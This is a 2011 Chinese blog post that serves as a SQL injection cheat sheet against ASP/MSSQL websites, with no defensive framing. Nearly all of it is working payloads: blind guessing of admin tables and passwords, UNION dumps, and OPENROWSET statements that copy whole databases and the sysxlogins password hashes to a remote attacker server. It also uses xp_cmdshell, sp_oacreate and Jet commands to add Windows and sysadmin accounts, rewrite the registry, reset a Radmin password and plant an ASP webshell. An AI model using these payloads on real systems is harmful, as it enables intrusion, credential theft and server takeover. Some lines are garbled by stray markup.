web脚本注入语句

作者: admin 分类: 学习文档 发布时间: 2011-11-24 22:44
【判断有无注入点】
'
and 1=1
and 1=2
__________________________________________________________________________________________
【猜表一般表的名称无非是:admin adminuser user pass password】
and 0(select count(*) from *) 
and 0(select count(*) from admin)    //判断是否存在admin这张表
__________________________________________________________________________________________
【猜帐号数目】
and 1=(select count(*) from admin where len(name)>0)                 //用户字段名称
and 1=(select count(*) from admin where len(_blank>password)>0)    //密码字段名称
__________________________________________________________________________________________
【猜解各个字段的长度】
猜解长度就是把>0变换 直到返回正确页面为止
猜解用户名:
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)       //错误
and 1=(select count(*) from admin where len(name)>5)       //正确 长度是6
and 1=(select count(*) from admin where len(name)=6)       //正确
猜解密码:
and 1=(select count(*) from admin where len(password)>11) //正确
and 1=(select count(*) from admin where len(password)>12) //错误 长度是12
and 1=(select count(*) from admin where len(password)=12) //正确
__________________________________________________________________________________________
【猜解字符】
猜解用户名:
and 1=(select count(*) from admin where left(name,1)=a)    //猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)    //猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
猜解密码:
and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51)
这个查询语句可以猜解中文的用户和_blank>密码.
只要把后面的数字换成中文的ASSIC码就OK.
最后把结果再转换成字符.
__________________________________________________________________________________________
【查看_blank>数据库连接账号的权限:如返回正常证明是_blank>服务器角色sysadmin权限】
and 1=(select @@VERSION)
__________________________________________________________________________________________
【判断连接_blank>数据库帐号:如采用SA账号连接返回正常就证明了连接账号是SA权限】
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))
__________________________________________________________________________________________
and sa=(SELECT System_blank>_user)
and user_blank>_name()=dbo
and 0(select user_blank>_name()
__________________________________________________________________________________________
【看xp_blank>_cmdshell是否删除】
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_blank>_cmdshell)
xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
__________________________________________________________________________________________
【爆库】
特殊_blank>技巧::%5c= 或者把/和 修改%5提交
and 0(select top 1 paths from newtable)
得到库名(从1到5都是系统的ID,6以上才可以判断) 
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 0(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9....
得到更多的_blank>数据库名 
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表假设为admin
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))
来得到其他的表。
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str (id)))暴到UID的数值假设为18779569 uid=id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_blank>_id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (id,...)) 来暴出其他的字段 
and 0_id from BBS.dbo.admin where username>1) 
可以得到用户名依次可以得到_blank>密码。假设存在user_blank>_id username ,password 等字段 
and 0(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
and 0 (select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名 
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address)) 
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin 
and uid>(str(id))) 判断id值 
and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 
?id=-1 union select 
1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 
?id=-1 union select 
1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用) 
__________________________________________________________________________________________
【开启远程_blank>数据库】
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) 
__________________________________________________________________________________________
【其中连接字符串参数可以是任何端口用来连接】
比如:
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd= 123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433
select * from table 
__________________________________________________________________________________________
【复制目标主机的整个_blank>数据库】
insert所有远程表到本地表
基本语法:
insert into OPENROWSET(SQLOLEDB, 
server=servername;uid=sa;pwd=123, select * from table1) select * from table2 
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方
比如: 
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address= 
xxx.xxx.xxx.xxx,1433;,select * from table1) select * from table2 
insert into 
OPENROWSET(SQLOLEDB,uid=sa;pwd= 
123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select * from 
_blank>_sysdatabases) 
select * from master.dbo.sysdatabases 
insert 
into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address= 
xxx.xxx.xxx.xxx,1433;,select * from _blank>_sysobjects) 
select * from 
user_blank> _database.dbo.sysobjects 
insert into 
OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address= 
xxx.xxx.xxx.xxx,1433;,select * from _blank>_syscolumns) 
select * from 
user_blank> _database.dbo.syscolumns
__________________________________________________________________________________________
【复制_blank>数据库】
insert into 
OPENROWSET(SQLOLEDB,uid=sa;pwd= 
123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select * from table1) select * 
from database..table1 
insert into 
OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select 
* from table2) select * from database..table2
__________________________________________________________________________________________
【复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中】 
insert into 
OPENROWSET (SQLOLEDB, 
uid=sa;pwd=123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select * from 
_blank>_sysxlogins) select * from database.dbo.sysxlogins 
得到hash之后,就可以进行暴力破解。 
遍历目录的方法: 先创建一个临时表:temp 
;create table temp(id 
nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
;insert temp exec master.dbo.xp_blank>_availablemedia;获得当前所有驱动器 
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:;获得子目录列表 
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:;
【获得所有子目录的目录树结构,并寸入temp表中】
;insert into temp(id) exec 
master.dbo.xp_blank>_cmdshell type c:webindex.asp;查看某个文件的内容 
;insert 
into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:;
;insert into 
temp(id) exec master.dbo.xp_blank>_cmdshell dir c: *.asp /s/a;
;insert 
into temp(id) exec master.dbo.xp_blank> _cmdshell cscript 
C:InetpubAdminScriptsadsutil.vbs enum w3svc 
;insert into temp(id,num1) 
exec master.dbo.xp_blank>_dirtree c:;(xp_blank>_dirtree适用权限PUBLIC)
__________________________________________________________________________________________
【写入表】
语句1:and 1= (SELECT IS_blank>_SRVROLEMEMBER(sysadmin));
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER (serveradmin));
语句3:and 
1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));
语句4:and 1=(SELECT 
IS_blank>_SRVROLEMEMBER(securityadmin));
语句5:and 1=(SELECT 
IS_blank>_SRVROLEMEMBER (securityadmin));
语句6:and 1=(SELECT 
IS_blank>_SRVROLEMEMBER(diskadmin));
语句7:and 1= (SELECT 
IS_blank>_SRVROLEMEMBER(bulkadmin));
语句8:and 1=(SELECT 
IS_blank>_SRVROLEMEMBER (bulkadmin));
语句9:and 1=(SELECT 
IS_blank>_MEMBER(db_blank>_owner));
__________________________________________________________________________________________
【把路径写到表中去】
;create table 
dirs(paths varchar(100), id int)
;insert dirs exec 
master.dbo.xp_blank>_dirtree c:
and 0(select top 1 paths from 
dirs)
and 0 (select top 1 paths from dirs where paths not 
in(@Inetpub))
;create table dirs1(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_blank>_dirtree e:web
and 
0(select top 1 paths from dirs1)
__________________________________________________________________________________________
【把_blank>数据库备份到网页目录下载】
declare @a sysname; set @a=db_blank>_name();backup database @a to 
disk=e:webdown.bak;
and 1=(Select top 1 name from(Select top 12 
id,name from sysobjects where xtype=char(85)) T order by id desc) 
and 
1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) 
from sysobjects)
__________________________________________________________________________________________
【参看相关表】
and 1=(select user_blank>_id from 
USER_blank>_LOGIN) 
and 0=(select user from USER_blank>_LOGIN where 
user>1) 
-=- wscript.shell example -=- 
declare @o int 
exec 
sp_blank>_oacreate wscript.shell, @o out 
exec sp_blank>_oamethod @o, 
run, NULL, notepad.exe 
; declare @o int exec sp_blank>_oacreate 
wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe
declare @o int, @f int, @t int, @ret int 
declare @line varchar(8000) 
exec sp_blank>_oacreate scripting.filesystemobject, @o out 
exec 
sp_blank>_oamethod @o, opentextfile, @f out, c:boot.ini, 1 
exec @ret = 
sp_blank>_oamethod @f, readline, @line out 
while( @ret = 0 ) 
begin 
print @line 
exec @ret = sp_blank>_oamethod @f, readline, @line out 
end 
declare @o int, @f int, @t int, @ret int 
exec 
sp_blank>_oacreate scripting.filesystemobject, @o out 
exec 
sp_blank>_oamethod @o, createtextfile, @f out, c:inetpubwwwrootfoo.asp, 1 
exec @ret = sp_blank>_oamethod @f, writeline, NULL, 
declare @o int, @ret int 
exec sp_blank>_oacreate 
speech.voicetext, @o out 
exec sp_blank> _oamethod @o, register, NULL, 
foo, bar 
exec sp_blank>_oasetproperty @o, speed, 150 
exec 
sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 
528 
waitfor delay 00:00:05 
; declare @o int, @ret int exec 
sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, 
register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec 
sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 
528 waitfor delay 00:00:05
xp_blank>_dirtree适用权限PUBLIC 
exec 
master.dbo.xp_blank>_dirtree c: 
__________________________________________________________________________________________
【返回的信息有两个字段】
subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 
create table dirs(paths 
varchar(100), id int) 
__________________________________________________________________________________________
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。 
insert dirs exec master.dbo.xp_blank>_dirtree c: 
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果, 
一步步达到我们想要的信息.
__________________________________________________________________________________________

【阿D常用注入命令】
【看看是什么权限】
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1
__________________________________________________________________________________________
【检测是否有读取某数据库的权限】
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1
__________________________________________________________________________________________
【数字类型】
and char(124)%2Buser%2Bchar(124)=0
__________________________________________________________________________________________
【字符类型】
and char(124)%2Buser%2Bchar(124)=0 and ''='
__________________________________________________________________________________________
【搜索类型】
and char(124)%2Buser%2Bchar(124)=0 and '%'='
__________________________________________________________________________________________
【爆用户名】
and user>0' and user>0 and ''='
__________________________________________________________________________________________
【检测是否为SA权限】
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
__________________________________________________________________________________________
【检测是不是MSSQL数据库】
and exists (select * from sysobjects)
__________________________________________________________________________________________
【检测是否支持多行】
declare @d int
__________________________________________________________________________________________
【恢复 xp_cmdshell】
exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
__________________________________________________________________________________________
select * from openrowset('sqloledb','server=xxx.xxx.xxx.xxx,1433;uid=test;pwd=pafpaf','select @@version') 
__________________________________________________________________________________________

【执行命令】
__________________________________________________________________________________________
【首先开启沙盘模式】
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1
__________________________________________________________________________________________
【然后利用jet.oledb执行系统命令】
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
__________________________________________________________________________________________
【执行命令】
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'
__________________________________________________________________________________________
【判断xp_cmdshell扩展存储过程是否存在】
http://xxx.xxx.xxx.xxx/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
__________________________________________________________________________________________
【写注册表】
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1
REG_SZ
__________________________________________________________________________________________
【读注册表】
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon','Userinit'
__________________________________________________________________________________________
【读取目录内容】
exec master..xp_dirtree 'c:winntsystem32',1,1
__________________________________________________________________________________________
【数据库备份】
backup database pubs to disk = 'c:123.bak'
__________________________________________________________________________________________
【爆出长度】
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0
__________________________________________________________________________________________
【更改sa口令方法:用sql综合利用工具连接后,执行命令】
exec sp_password NULL,'新密码','sa'
__________________________________________________________________________________________
【添加和删除一个SA权限的用户test】
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
__________________________________________________________________________________________
【删除扩展存储过过程xp_cmdshell的语句】
exec sp_dropextendedproc 'xp_cmdshell'
__________________________________________________________________________________________
【添加扩展存储过过程】
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:winntsystem32sqllog.dll' 
GRANT exec On xp_proxiedadata TO public 
__________________________________________________________________________________________
【停掉或激活某个服务】
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
__________________________________________________________________________________________
【只列某个目录下的子目录】
xp_getfiledetails 'C:InetpubwwwrootSQLInjectlogin.asp'
dbo.xp_makecab
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开
dbo.xp_makecab
'c:test.cab','mszip',1,
'C:InetpubwwwrootSQLInjectlogin.asp',
'C:InetpubwwwrootSQLInjectsecurelogin.asp'
xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
xp_terminate_process 2484
xp_unpackcab
解开压缩档。
xp_unpackcab 'c:test.cab','c:temp',1
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为123456。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','port','REG_BINARY',0xd20400 则端口值改为1234
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
__________________________________________________________________________________________
【得到数据库名】
insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
__________________________________________________________________________________________
【在Master中创建表,看看权限怎样】
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL)
__________________________________________________________________________________________
【用 sp_makewebtask直接在web目录里写入一句话马】
''%20'">[url]http://xxx.xxx.xxx.xxx/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:wwwtt88.asp','%20select%20''<%25execute(request("a"))%25>''%20'[/url]
__________________________________________________________________________________________
【更新表内容】
Update films SET kind = 'Dramatic' Where id = 123
__________________________________________________________________________________________
【删除内容】
delete from table_name where Stockid = 3

如果觉得我的文章对您有用,请随意赞赏。您的支持将鼓励我继续创作!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

Protected by WP Anti Spam